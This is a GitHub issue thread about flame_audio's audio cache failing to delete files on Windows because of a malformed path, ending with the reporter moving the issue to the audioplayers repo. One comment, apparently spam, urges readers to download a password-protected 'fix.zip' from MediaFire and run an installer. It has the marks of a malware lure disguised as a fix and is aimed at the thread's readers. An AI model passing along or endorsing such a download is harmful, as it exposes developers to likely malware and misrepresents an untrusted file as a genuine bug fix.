### ISSUE TITLE
[flame_audio] `FlameAudio.audioCache.clear` error on Windows app

### ISSUE THREAD

**Issue by JankLai** [flame-engine/flame#3283]
### What happened?

I am creating a game on Windows. I am using **flame_audio: ^2.10.2** for sounds, there is an issue when clearing cache: The audio cache cannot be deleted(**Windows** only, Android is ok).

The code:
```dart
await FlameAudio.audioCache.load(songName!); // This is ok.
...
FutureOr<void> ClearMusic() async {
  if (songName == null) {
    return;
  }
  if (!useAudioPlayer) {
    await FlameAudio.bgm.stop();
  } else {
    await musicPlayer!.stop();
  }
  await FlameAudio.audioCache.clear(songName!); // Error log.
}
```
And the error message is:
```
[ERROR:flutter/runtime/dart_vm_initializer.cc(40)] Unhandled Exception: FileSystemException: Cannot delete file, path = '/C:/Users/74218/AppData/Local/Temp/01c990ea-fe02-458e-9226-e4d9f83ce84f/melody/my_music.mp3`
```

From the error log I can see why the file cannot be found is that the file path is wrong, for windows uses backslashes (\) as directory separators.

### What do you expect?

Be able to delete audio cache for Windows app.

### Relevant log output
```
[ERROR:flutter/runtime/dart_vm_initializer.cc(40)] Unhandled Exception: FileSystemException: Cannot delete file, path = '/C:/Users/74218/AppData/Local/Temp/01c990ea-fe02-458e-9226-e4d9f83ce84f/melody/my_music.mp3`
```

### Affected platforms

Windows

### Are you interested in working on a PR for this?

- [ ] I want to work on this

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JankLai** [comment]
> @JankLai that code is from `audioplayers` package. Can you report this as an issue on that repo? https://github.com/bluefireteam/audioplayers

Ok, here is the issue: https://github.com/bluefireteam/audioplayers/issues/1836. Close this one.
